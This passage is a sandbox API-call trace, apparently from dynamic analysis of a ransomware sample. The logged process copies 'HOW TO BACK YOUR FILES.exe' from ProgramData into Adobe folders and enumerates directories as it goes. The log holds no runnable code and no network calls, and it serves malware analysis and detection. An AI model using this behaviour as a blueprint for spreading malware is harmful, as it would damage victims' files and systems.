hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0091.626] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 76 [0091.626] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.626] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.626] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.627] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.627] GetLastError () returned 0x0 [0091.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.627] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.627] CloseHandle (hObject=0x120) returned 1 [0091.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.627] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.627] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.627] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.627] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.627] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0091.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0091.627] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat") returned 66 [0091.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.627] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.627] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.628] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.628] GetLastError () returned 0x0 [0091.628] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.628] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.628] CloseHandle (hObject=0x120) returned 1 [0091.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.628] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.629] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.629] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0091.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0091.629] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 71 [0091.629] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.629] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.629] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.629] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.630] GetLastError () returned 0x0 [0091.630] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.630] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.630] CloseHandle (hObject=0x120) returned 1 [0091.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.630] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.630] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.630] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.630] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.630] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0091.630] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0091.630] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 81 [0091.630] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.630] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.630] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.631] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.631] GetLastError () returned 0x0 [0091.631] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.631] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.631] CloseHandle (hObject=0x120) returned 1 [0091.631] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.631] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.631] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.631] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.631] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.632] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0091.632] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0091.632] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 90 [0091.632] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.632] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.632] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.632] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.633] GetLastError () returned 0x0 [0091.633] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.633] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.633] CloseHandle (hObject=0x120) returned 1 [0091.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.633] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.633] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.633] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.633] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Adobe" [0091.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0091.633] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0091.633] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Adobe") returned 41 [0091.633] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Adobe" [0091.633] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.633] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.634] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.634] GetLastError () returned 0x0 [0091.634] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.634] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.634] CloseHandle (hObject=0x120) returned 1 [0091.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.634] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.634] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.634] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.634] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Adobe\\ARM" [0091.634] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0091.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0091.635] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Adobe\\ARM") returned 45 [0091.635] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Adobe\\ARM" [0091.635] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.635] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.635] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.635] GetLastError () returned 0x0 [0091.635] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.635] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.635] CloseHandle (hObject=0x120) returned 1 [0091.635] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.636] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.636] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.636] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.636] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.636] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0091.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0091.636] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 59 [0091.636] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.637] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.637] GetLastError () returned 0x0 [0091.637] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.637] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.637] CloseHandle (hObject=0x120) returned 1 [0091.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.637] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.637] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.637] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.637] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.637] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat" [0091.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0091.637] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0091.637] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat") returned 49 [0091.637] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Adobe\\Acrobat" [0091.637] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.637] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 